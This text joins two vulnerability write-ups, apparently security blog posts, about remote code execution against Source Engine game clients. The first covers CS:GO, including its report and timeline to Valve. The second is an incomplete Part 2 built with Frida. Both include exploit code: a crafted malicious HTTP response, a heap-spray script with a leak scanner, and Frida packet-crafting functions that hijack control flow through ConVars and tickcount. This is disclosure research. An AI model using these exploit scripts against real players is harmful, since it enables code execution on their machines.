More importantly, this custom UDP-based protocol carries Protobuf serialized payloads. Protobuf is a technology developed by Google which allows defining messages and provides an API for serializing and deserializing those messages.

Here is an example of a protobuf message defined and used by the CS:GO developers:

message CSVCMsg_VoiceInit {
	optional int32 quality = 1;
	optional string codec = 2;
	optional int32 version = 3 [default = 0];
}

We found this message definition by doing a Google search after having discovered CS:GO utilizes Protobuf. We came across the SteamDatabase GitHub repository containing a list of Protobuf message definitions.

As the name of the message suggests, it’s used to initialize some kind of voice-message transfer of one player to the server. The message body carries some parameters, such as the codec and version used to interpret the voice data.

Developing a CS:GO proxy

Having this list of messages and their definitions enabled us to gain insights into what kind of data is sent between the client and server. However, we still had no idea in which order messages would be sent and what kind of values were expected. For example, we knew that a message exists to initialize a voice message with some codec, but we had no idea which codecs are supported by CS:GO.

For this reason, we developed a proxy for CS:GO that allowed us to view the communication in real-time. The idea was that we could launch the CS:GO game and connect to any server through the proxy and then dump any messages received by the client and sent to the server. For this, we reverse-engineered the networking code to decrypt and unpack the messages.

We also added the ability to modify the values of any message that would be sent/received. Since an attacker ultimately controls any value in a Protobuf serialized message sent between clients and the server, it becomes a possible attack surface. We could find bugs in the code responsible for initializing a connection without reverse-engineering it by mutating interesting fields in messages.

The following GIF shows how messages are being sent by the game and dumped by the proxy in real-time, corresponding to events such as shooting, changing weapons, or moving:

Equipped with this tooling, it was now time for us to discover bugs by flipping some bits in the protobuf messages.

OOB access in `CSVCMsg_SplitScreen`

We discovered that a field in the CSVCMsg_SplitScreen message, that can be sent by a (malicious) server to a client, can lead to an OOB access which subsequently leads to a controlled virtual function call.

The definition of this message is:

message CSVCMsg_SplitScreen {
	optional .ESplitScreenMessageType type = 1 [default = MSG_SPLITSCREEN_ADDUSER];
	optional int32 slot = 2;
	optional int32 player_index = 3;
}

CSVCMsg_SplitScreen seemed interesting, as a field called player_index is controlled by the server. However, contrary to intuition, the player_index field is not used to access an array, the slot field is. As it turns out, the slot field is used as an index for the array of splitscreen player objects located in the .data segment of engine.dll file without any bounds checks.

Looking at the crash we could already observe some interesting facts:

The array is stored in the .data section within engine.dll
After accessing the array, an indirect function call on the accessed object occurs

The following screenshot of decompiled code shows how player_splot was used without any checks as an index. If the first byte of the object was not 1, a branch is entered:

The bug proved to be quite promising, as a few instructions into the branch a vtable is dereferenced and a function pointer is called. This is shown in the next screenshot:

We were very excited about the bug as it seemed highly exploitable, given an info leak. Since the pointer to an object is obtained from a global array within engine.dll, which at the time of writing is a 6MB binary, we were confident that we could find a pointer to data we control. Pointing the aforementioned object to attacker controlled data would yield arbitrary code execution.

However, we would still have to fake a vtable at a known location and then point the function pointer to something useful. Due to this constraint, we decided to look for another bug that could lead to an info leak.

Uninitialized memory in HTTP downloads leads to information disclosure

As mentioned earlier, server admins can create servers with any number of customizations, including custom maps and sounds. Whenever a player joins a server with such customizations, files behind the customizations need to be transferred. Server admins can create a list of files that need to be downloaded for each map in the server’s playlist.

During the connection phase, the server sends the client the URL of a HTTP server where necessary files should be downloaded from. For each custom file, a cURL request would be created. Two options that were set for each request piqued our interested: CURLOPT_HEADERFUNCTION and CURLOPT_WRITEFUNCTION. The former allows a callback to be registered that is called for each HTTP header in the HTTP response. The latter allows registering a callback that is triggered whenever body data is received.

The following screenshot shows how these options are set:

We were interested in seeing how Valve developers handled incoming HTTP headers and reverse engineered the function we named CurlHeaderCallback().

It turned out that the CurlHeaderCallback() simply parsed the Content-Length HTTP header and allocated an uninitialized buffer on the heap accordingly, as the Content-Length should correspond to the size of the file that should be downloaded.

The CurlWriteCallback() would then simply write received data to this buffer.

Finally, once the HTTP request finished and no more data was to be received, the buffer would be written to disk.

We immediately noticed a flaw in the parsing of the HTTP header Content-Length: As the following screenshot shows, a case sensitive compare was made.

Case sensitive search for the Content-Length header.

This compare is flawed as HTTP headers can be lowercase as well. This is only the case for Linux clients as they use cURL and then do the compare. On Windows the client just assumes that the value returned by the Windows API is correct. This yields the same bug, as we can just send an arbitrary Content-Length header with a small response body.

We set up a HTTP server with a Python script and played around with some HTTP header values. Finally, we came up with a HTTP response that triggers the bug:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1337
content-length: 0
Connection: closed

When a client receives such a HTTP response for a file download, it would recognize the first Content-Length header and allocate a buffer of size 1337. However, a second content-length header with size 0 follows. Although the CS:GO code misses the second Content-Length header due to its case sensitive search and still expects 1337 bytes of body data, cURL uses the last header and finishes the request immediately.

On Windows, the API just returns the first header value even though the response is ill-formed. The CS:GO code then writes the allocated buffer to disk, along with all uninitialized memory contents, including pointers, contained within the buffer.

Although it appears that CS:GO uses the Windows API to handle the HTTP downloads on Windows, the exact same HTTP response worked and allowed us to create files of arbitrary size containing uninitialized memory contents on a player’s machine.

A server can then request these files through the CNETMsg_File message. When a client receives this message, they will upload the requested file to the server. It is defined as follows:

message CNETMsg_File {
	optional int32 transfer_id = 1;
	optional string file_name = 2;
	optional bool is_replay_demo_file = 3;
	optional bool deny = 4;
}

Once the file is uploaded, an attacker controlled server could search the file’s contents to find pointers into engine.dll or heap pointers to break ASLR. We described this step in detail in our appendix section Breaking ASLR.

Putting it all together: ConVars as a gadget

To further enable customization of the game, the server and client exchange ConVars, which are essentially configuration options.

Each ConVar is managed by a global object, stored in engine.dll. The following code snippet shows a simplified definition of such an object which is used to explain why ConVars turned out to be a powerful gadget to help exploit the OOB access:

struct ConVar {
    char *convar_name;
    int data_len;
    void *convar_data;
    int color_value;
};

A community server can update its ConVar values during a match and notify the client by sending the CNETMsg_SetConVar message:

message CMsg_CVars {
	message CVar {
		optional string name = 1;
		optional string value = 2;
		optional uint32 dictionary_name = 3;
	}

	repeated .CMsg_CVars.CVar cvars = 1;
}

message CNETMsg_SetConVar {
	optional .CMsg_CVars convars = 1;
}

These messages consist of a simple key/value structure. When comparing the message definition to the struct ConVar definition, it is correct to assume that the entirely attacker-controllable value field of the ConVar message is copied to the client’s heap and a pointer to it is stored in the convar_value field of a ConVar object.

As we previously discussed, the OOB access in CSVCMsg_SplitScreen occurs in an array of pointers to objects. Here is the decompilation of the code in which the OOB access occurs as a reminder:

Since the array and all ConVars are located in the .data section of engine.dll, we can reliably set the player_slot argument such that the ptr_to_object points to a ConVar value which we previously set. This can be illustrated as follows:

We also mentioned earlier that a few instructions after the OOB access a virtual method on the object is called. This happens as usual through a vtable dereference. Here is the code again as a reminder:

Since we control the contents of the object through the ConVar, we can simply set the vtable pointer to any value. In order to make the exploit 100% reliable, it would make sense to use the info leak to point back into the .data section of engine.dll into controlled data.

Luckily, some ConVars are interpreted as color values and expect a 4 byte (Red Blue Green Alpha) value, which can be attacker controlled. This value is stored directly in the color_value field in above struct ConVar definition. Since the CS:GO process on Windows is 32-bit, we were able to use the color value of a ConVar to fake a pointer.

If we use the fake object’s vtable pointer to point into the .data section of engine.dll, such that the called method overlaps with the color_value, we can finally hijack the EIP register and redirect control flow arbitrarily. This chain of dereferences can be illustrated as follows:

ROP chain to RCE

With ASLR broken and us having gained arbitrary instruction pointer control, all that was left to do was build a ROP chain that finally lead to us calling ShellExecuteA to execute arbitrary system commands.

Conclusion

We submitted both bugs in one report to Valve’s HackerOne program, along with the exploit we developed that proved 100% reliablity. Unfortunately, in over 4 months, we did not even receive an acknowledgment by a Valve representative. After public pressure, when it became apparent that Valve had also ignored other Security Researchers with similar impact, Valve finally fixed numerous security issues. We hope that Valve re-structures its Bug Bounty program to attract Security Researchers again.

Time Table

Date (DD/MM/YYYY)	What
04.01.2021	Reported both bugs in one report to Valve’s bug bounty program
11.01.2021	A HackerOne triager verifies the bug and triages it
10.02.2021	First follow-up, no response from Valve
23.02.2021	Second follow-Up, no response from Valve
10.04.2021	Disclosure of Bug existance via twitter
15.04.2021	Third follow-up, no response from Valve
28.04.2021	Valve patches both bugs

Breaking ASLR

In the Uninitialized memory in HTTP downloads leads to information disclosure section, we showed how the HTTP download allowed us to view arbitrarily sized chunks of uninitialized memory in a client’s game process.

We discovered another message that seemed quite interesting to us: CSVCMsg_SendTable. Whenever a client received such a message, it would allocate an object with attacker-controlled integer on the heap. Most importantly, the first 4 bytes of the object would contain a vtable pointer into engine.dll.

def spray_send_table(s, addr, nprops):
    table = nmsg.CSVCMsg_SendTable()
    table.is_end = False
    table.net_table_name = "abctable"
    table.needs_decoder = False

    for _ in range(nprops):
        prop = table.props.add()
        prop.type = 0x1337ee00
        prop.var_name = "abc"
        prop.flags = 0
        prop.priority = 0
        prop.dt_name = "whatever"
        prop.num_elements = 0
        prop.low_value = 0.0
        prop.high_value = 0.0
        prop.num_bits = 0x00ff00ff

    tosend = prepare_payload(table, 9)
    s.sendto(tosend, addr)

The Windows heap is kind of nondeteministic. That is, a malloc -> free -> malloc combo will not yield the same block. Thankfully, Saar Amaar published his great research about the Windows heap, which we consulted to get a better understanding about our exploit context.

We came up with a spray to allocate many arrays of SendTable objects with markers to scan for when we uploaded the files back to the server. Because we can choose the size of the array, we chose a not so commonly alloacted size to avoid interference with normal game code. If we now deallocate all of the sprayed arrays at once and then let the client download the files the chance of one of the files to hit a previously sprayed chunk is relativly high.

In practice, we almost always got the leak in the first file and when we didn’t we could simply reset the connection and try again, as we have not corrupted the program state yet. In order to maximize success, we created four files for the exploit. This ensures that at least one of them succeeds and otherwise simply try again.

The following code shows how we scanned the received memory for our sprayed object to find the SendTable vtable which will point into engine.dll.

files_received.append(fn)
pp = packetparser.PacketParser(leak_callback)

for i in range(len(data) - 0x54):
    vtable_ptr = struct.unpack('<I', data[i:i+4])[0]
    table_type = struct.unpack('<I', data[i+8:i+12])[0]
    table_nbits = struct.unpack('<I', data[i+12:i+16])[0]
    if table_type == 0x1337ee00 and table_nbits == 0x00ff00ff:
        engine_base = vtable_ptr - OFFSET_VTABLE 
        print(f"vtable_ptr={hex(vtable_ptr)}")
        break

Reversing Engineering for the Soul
Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida
1 May 2021 at 00:00

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Reversing Engineering for the Soul

1 May 2021 at 00:00

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

Client connects to server
Server exploits stack-based buffer overflow in the client
Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

Arbitrary relative pointer writes to pointers in global queryable objects
Heap overflows against a queryable object to cause controllable pointer writes
Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
The exploit must produce its own pointer leak, or chain another bug to infoleak
The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
The exploit must have a ~100% stability rate
The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
The code dereferences the first value inside of m_pszString to get the pointer to the vtable
The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA)

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

Servers can cause the client to upload arbitrary files with certain file extensions
Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
